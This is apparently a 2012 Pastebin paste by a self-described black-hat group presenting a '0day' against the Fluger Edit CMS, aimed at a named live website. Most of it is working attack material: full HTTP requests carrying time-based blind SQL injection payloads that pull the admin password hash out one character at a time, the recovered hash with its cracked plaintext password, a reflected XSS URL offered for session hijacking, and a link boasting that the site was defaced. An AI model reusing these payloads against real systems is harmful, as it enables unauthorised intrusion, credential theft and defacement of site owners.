Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [red]0day for fucked fluger arm bitch studio[/red]
- [code]
- =====================================================
- Vulnerable Software: Fluger Edit v.2 || administration software
- Vendor: http://www.fluger.com/
- Software License: Commercial
- Vulnerabilities: Blind SQL Injection And XSS
- Tested: In Wild
- =====================================================
- Dork :
- Designed and developed by Fluger IT
- All right reserved © | 2004 - 2012
- ************** FOR OUR BRO RAMIL SEFEROV! ************************
- @OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
- I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
- ********************** REALLY! ********************************************
- ******************ENJOY MAXIMALLY**************************************
- ======================================================
- FULLY disclosured Real Exploitation examples:
- GPC MUST BE=OFF
- Theris Blind SQLi vulnerability on login page:
- http://www.artclima.am/edit/ <===(Admin panel)
- Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php
- (Sorry i have no access to source code)
- CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png
- Due authentication mechanism you can't bypass login form by sending:
- 'or''='
- Instead of you can use Time Based Way to obtain logins:password from admin table.
- Here we go:
- Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png
- http://www.artclima.am/edit/index.php?error
- Headers:
- Host: www.artclima.am
- User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip, deflate
- DNT: 1
- Connection: keep-alive
- Cookie: PHPSESSID=:$
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 28
- POST DATA:
- username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- *REPLAY*
- loginde Blind varidir.
- Bypass getmir.
- Time Based RuleZ!
- www.artclima.am/edit/index.php?error
- columnlar:
- user
- password
- table: admin
- =========================================
- 1 user var:
- //TRUE
- username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir
- cekek logini
- login: admin
- //TRUE
- username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir
- parolu cekek:
- =========================================
- 1-ci simvol: e
- username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 2-ci simvol: 0
- username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 3-cu simvol: 4
- username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 4-cu simvol: 4
- username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 5-ci simvol: 6
- username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 6-ci simvol: 5
- username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 7-ci simvol: 0
- username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 8-ci simvol: a
- username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 9-cu simvol: 5
- username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 10-cu simvol: 6
- username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 11-ci simvol: 7
- username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 12-ci simvol: e
- username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 13-cu simvol: d
- username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- yoxla sonra
- =========================================
- 14-cu simvol: 2
- username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 15-ci simvol: b
- username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 16-ci simvol: 2
- username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 17-ci simvol: d
- username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 18-ci simvol: 0
- username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 19-cu simvol: 4
- username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 20-ci simvol: 3
- username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 21-ci simvol: 0
- username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 22-ci simvol: 3
- username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 23-cu simvol: e
- username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 24-cu simvol: 3
- username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 25-ci simvol: 7
- username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 26-ci simvol: 9
- username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 27-ci simvol: 3
- username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 28-ci simvol: d
- username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 29-cu simvol: f
- username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 30-cu simvol: d
- username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 31-ci simvol: 9
- username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- 32-ci simvol: 5
- username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- =========================================
- Verification: +
- //TRUE
- username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
- MD5: e044650a567ed2b2d04303e3793dfd95
- Resolves to: price777
- Sure! I will "rm"-it too with great pleasure!
- Rmned: http://zone-h.org/mirror/id/18295382
- Second way: Session Hijack to gain access to admin panel:
- XSS:
- http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1
- Print Screen:
- http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png
- From source code of page:
- <table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
- <tr valign="top">
- <td class="bg_content">
- <div id="printarea">
- <table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
- <tr>
- <td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
- <td> </td>
- </tr>
- </table>
- <table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >
- ==========================THE END=========================
- SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
- ===========================================================
- packetstormsecurity.org
- packetstormsecurity.com
- packetstormsecurity.net
- securityfocus.com
- cxsecurity.com
- security.nnov.ru
- securtiyvulns.com
- securitylab.ru
- secunia.com
- securityhome.eu
- exploitsdownload.com
- exploit-db.com
- to all AA Team + to all Azerbaijan Black HatZ +
- *Especially to my bro CAMOUFL4G3.*
- ===========================================================
- /AkaStep
- 02.09.2012
- [/code]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement